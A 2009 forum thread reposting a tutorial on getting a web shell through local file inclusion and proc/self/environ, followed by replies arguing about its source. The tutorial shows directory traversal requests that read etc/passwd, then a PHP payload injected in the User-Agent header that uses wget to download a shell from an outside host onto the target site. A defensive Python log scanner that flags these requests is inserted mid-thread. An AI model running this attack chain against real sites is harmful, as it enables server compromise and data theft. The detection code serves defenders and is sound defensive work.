ZeroCold, posted September 26, 2009 (edited):

Shell via LFI - the proc/self/environ method

1 - Introduction
2 - Finding an LFI
3 - Checking whether proc/self/environ is accessible
4 - Injecting malicious code
5 - Accessing the shell
6 - Thanks

>> 1 - Introduction

In this tutorial I will show you how to get a shell on a site by using Local File Inclusion and injecting malicious code into proc/self/environ. It is a tutorial that explains everything step by step.

>> 2 - Finding an LFI

- Now let's find a site vulnerable to Local File Inclusion. I found a target, let's check it:

    www.website.com/view.php?page=contact.php

- Now let's replace contact.php with ../ and the URL becomes

    www.website.com/view.php?page=../

and we get an error.

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

There is a good chance we have a Local File Inclusion vulnerability. Let's move on.

- Let's check whether we can access etc/passwd, to see whether it is vulnerable to Local File Inclusion. Let's make a request:

    www.website.com/view.php?page=../../../etc/passwd

We get an error and the etc/passwd file is not included.

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

We go up a few directories:

    www.website.com/view.php?page=../../../../../etc/passwd

We have successfully included the etc/passwd file.

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    test:x:13:30:test:/var/test:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Checking whether proc/self/environ is accessible

- Now let's see whether proc/self/environ is accessible. We will replace etc/passwd with proc/self/environ:

    www.website.com/view.php?page=../../../...lf/environ

If you get something like

    DOCUMENT_ROOT=/home/sirgod/public_html
    GATEWAY_INTERFACE=CGI/1.1
    HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
    HTTP_HOST=www.website.com
    HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
    HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
    PATH=/bin:/usr/bin
    QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
    REDIRECT_STATUS=200
    REMOTE_ADDR=6x.1xx.4x.1xx
    REMOTE_PORT=35665
    REQUEST_METHOD=GET
    REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
    SCRIPT_FILENAME=/home/sirgod/public_html/index.php
    SCRIPT_NAME=/index.php
    SERVER_ADDR=1xx.1xx.1xx.6x
    SERVER_ADMIN=webmaster@website.com
    SERVER_NAME=www.website.com
    SERVER_PORT=80
    SERVER_PROTOCOL=HTTP/1.0
    SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

then proc/self/environ is accessible. If you get a blank page or an error, it means it is not accessible or the operating system is FreeBSD.

>> 4 - Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We inject the code into the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data and make a request to the URL:

    www.website.com/view.php?page=../../../ ... lf/environ

Choose Tamper and, in the User-Agent field, write the following code:

    <?system('wget hack-bay.com -O shell.php');?>

Then submit the request. Our command will be executed through the system() function (it will download a txt shell from hack-bay.com (http://hack-bay.com/Shells/gny.txt) and save it as shell.php in the site's directory), and our shell will be created. If it does not work, try exec(), because system() may be restricted on the server through php.ini.

>> 5 - Accessing the shell

- Now let's check whether our malicious code was injected successfully. Let's see whether the shell is present:

    www.website.com/shell.php

Our shell is there. The injection was carried out successfully.

Source: insecurity.ro ; Author: SirGod

Edited September 26, 2009 by ZeroCold
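For defenders, the requests described in the post above leave a recognisable trail in the web server's access log: traversal sequences in the query string, an etc/passwd or proc/self/environ target, and a PHP open tag in a request header. The following is an added example, not part of the original post, that flags those three signs in Apache combined-format log lines; the sample lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: client, time, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
TRAVERSAL = re.compile(r'\.\./')
TARGET = re.compile(r'proc/self/environ|etc/passwd')
PHP_TAG = re.compile(r'<\?')

# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE = [
    '203.0.113.7 - - [26/Sep/2009:10:00:01 +0000] "GET /view.php?page=contact.php '
    'HTTP/1.1" 200 5120 "-" "Opera/9.80 (Windows NT 5.1; U; en)"',
    '203.0.113.7 - - [26/Sep/2009:10:01:12 +0000] "GET /view.php?page=../../../../../etc/passwd '
    'HTTP/1.1" 200 912 "-" "Opera/9.80 (Windows NT 5.1; U; en)"',
    '203.0.113.7 - - [26/Sep/2009:10:03:40 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..'
    '%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1400 "-" "<?php /* constructed marker */ ?>"',
]

def decode(value, rounds=3):
    """URL-decode repeatedly so %2F and double-encoded %252F are normalised."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value.replace('\\', '/')  # treat ..\ like ../

def classify(line):
    """Return the set of findings for one access-log line (empty set = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return {'unparsed'}
    findings = set()
    uri = decode(m['uri'])
    if TRAVERSAL.search(uri):
        findings.add('traversal')
    if TARGET.search(uri):
        findings.add('target-file')
    # Header values are copied into the process environment (HTTP_USER_AGENT, HTTP_REFERER).
    if PHP_TAG.search(decode(m['agent'])) or PHP_TAG.search(decode(m['referer'])):
        findings.add('php-in-header')
    return findings

def scan(lines):
    """Return (line number, sorted findings) for every suspicious line."""
    return [(n, sorted(f)) for n, f in ((n, classify(l)) for n, l in enumerate(lines, 1)) if f]
```

Detection of this kind is a backstop; the underlying fix is to map the page parameter to a fixed allowlist of files instead of passing it to include().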
Guest Praetorian, posted September 26, 2009:
Very simple.. I'm going to get myself a loaf of bread!
Adso, posted September 26, 2009:
http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst
dRuNNNk, posted September 26, 2009:
I've seen it before on RST; anyway, it was made by SirGod.
Adso, posted September 26, 2009:
Quote: "I've seen it before on RST; anyway, it was made by SirGod."
A two-lei reply; you didn't say anything, in fact you just repeated what I posted and its source!
dRuNNNk, posted September 26, 2009:
Sorry, I didn't notice that you had written it too.
ZeroCold (author), posted September 26, 2009:
Quote: "http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst"
I hadn't seen that one, but anyway this one here is more visible. And... yes, it was made by SirGod; I put the author and source at the end.